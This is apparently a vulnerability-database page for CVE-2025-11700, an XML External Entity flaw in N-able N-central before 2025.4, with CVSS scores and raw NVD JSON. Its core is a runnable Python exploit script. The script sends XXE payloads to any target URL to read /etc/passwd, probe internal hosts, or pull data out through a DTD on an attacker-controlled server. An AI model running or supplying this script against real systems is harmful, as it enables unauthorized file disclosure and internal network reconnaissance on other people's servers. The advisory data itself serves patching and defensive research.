Security Vulnerability Report
中文
CVE-2025-11700 CVSS 7.5 HIGH

CVE-2025-11700

Published: 2025-11-12 16:15:35
Last Modified: 2025-12-15 15:15:47
Source: a5532a13-c4dd-4202-bef1-e0b8f2f8d12b

Description

N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:* - VULNERABLE
N-central < 2025.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-11700 XXE Injection PoC for N-central # Target: N-central versions < 2025.4 def exploit_xxe(target_url, payload_type='file_read'): """ Exploit XXE vulnerability to read local files or perform SSRF """ # XML payload for reading local files file_read_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> <data>&xxe;</data> </root>''' # XML payload for SSRF/internal network probing ssrf_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://internal-server/local-test"> ]> <root> <data>&xxe;</data> </root>''' # XML payload using parameter entities for blind XXE blind_xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % dtd SYSTEM "http://attacker-controlled-server/evil.dtd"> %dtd; %all; ]> <root>&exfil;</root>''' payloads = { 'file_read': file_read_payload, 'ssrf': ssrf_payload, 'blind': blind_xxe_payload } xml_payload = payloads.get(payload_type, file_read_payload) headers = { 'Content-Type': 'application/xml', 'User-Agent': 'Mozilla/5.0' } try: print(f"[*] Sending XXE payload to {target_url}") print(f"[*] Payload type: {payload_type}") response = requests.post( target_url, data=xml_payload, headers=headers, timeout=30, verify=False ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response:\n{response.text}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11700.py <target_url> [payload_type]") print("Payload types: file_read, ssrf, blind") sys.exit(1) target = sys.argv[1] ptype = sys.argv[2] if len(sys.argv) > 2 else 'file_read' exploit_xxe(target, ptype)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11700", "sourceIdentifier": "a5532a13-c4dd-4202-bef1-e0b8f2f8d12b", "published": "2025-11-12T16:15:35.487", "lastModified": "2025-12-15T15:15:47.453", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure"}], "metrics": {"cvssMetricV40": [{"source": "a5532a13-c4dd-4202-bef1-e0b8f2f8d12b", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "a5532a13-c4dd-4202-bef1-e0b8f2f8d12b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.4", "matchCriteriaId": "02C3E2C7-F1EC-419A-988C-586E7DDF6685"}]}]}], "references": [{"url": "https://me.n-able.com/s/security-advisory/aArVy0000000rabKAA", "source": "a5532a13-c4dd-4202-bef1-e0b8f2f8d12b"}]}}